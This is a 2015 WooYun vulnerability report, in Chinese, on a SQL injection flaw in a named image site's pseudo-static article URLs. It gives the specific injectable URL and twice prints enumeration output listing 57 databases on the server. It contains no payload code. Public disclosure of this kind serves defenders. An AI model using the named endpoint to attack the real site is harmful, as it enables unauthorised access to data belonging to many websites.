漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0125945
漏洞标题:求图网伪静态注入50多个数据库泄露
相关厂商:QT网
漏洞作者: 开心一下1313
提交时间:2015-07-12 20:26
修复时间:2015-08-26 20:28
公开时间:2015-08-26 20:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
rt
详细说明:
求图网伪静态注入:http://www.qt263.cn/index.php/Article/show/id/3485.html
57个数据库......
available databases [57]:
[*] `110110`
[*] `126shopping`
[*] `20120405sql`
[*] `209120329sql`
[*] `316`
[*] `4321w`
[*] `4321wcom`
[*] `4399wy`
[*] `576rc`
[*] `800`
[*] bianmu
[*] btc
[*] ceshi
[*] cf
[*] deyi163
[*] fc
[*] fzl
[*] fzlpic
[*] fzlpic1
[*] fzppic
[*] information_schema
[*] jf_qt263
[*] jianfei8
[*] keai_sql
[*] meinv
[*] minzhubbs
[*] mm4321w
[*] mysql
[*] performance_schema
[*] ps
[*] ps2
[*] ps3
[*] pssql
[*] qianqian6
[*] qiutu
[*] qq1
[*] qq2
[*] qq3
[*] qqcar
[*] qqcar1
[*] qqcar3
[*] qqcar4
[*] qqcar5
[*] qqmcqt263
[*] qqmokuai
[*] qt128cn
[*] qt128comcn
[*] qt263bbs
[*] qt363
[*] qtpfuns
[*] shareimg
[*] sq_test208
[*] test
[*] webqt263
[*] weimei
[*] wwwcf
[*] wy23701
很多网站都是将数据放在这上面,多个网站遭殃。
等等......
漏洞证明:
57个数据库......
available databases [57]:
[*] `110110`
[*] `126shopping`
[*] `20120405sql`
[*] `209120329sql`
[*] `316`
[*] `4321w`
[*] `4321wcom`
[*] `4399wy`
[*] `576rc`
[*] `800`
[*] bianmu
[*] btc
[*] ceshi
[*] cf
[*] deyi163
[*] fc
[*] fzl
[*] fzlpic
[*] fzlpic1
[*] fzppic
[*] information_schema
[*] jf_qt263
[*] jianfei8
[*] keai_sql
[*] meinv
[*] minzhubbs
[*] mm4321w
[*] mysql
[*] performance_schema
[*] ps
[*] ps2
[*] ps3
[*] pssql
[*] qianqian6
[*] qiutu
[*] qq1
[*] qq2
[*] qq3
[*] qqcar
[*] qqcar1
[*] qqcar3
[*] qqcar4
[*] qqcar5
[*] qqmcqt263
[*] qqmokuai
[*] qt128cn
[*] qt128comcn
[*] qt263bbs
[*] qt363
[*] qtpfuns
[*] shareimg
[*] sq_test208
[*] test
[*] webqt263
[*] weimei
[*] wwwcf
[*] wy23701
修复方案:
过滤
版权声明:转载请注明来源 开心一下1313@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝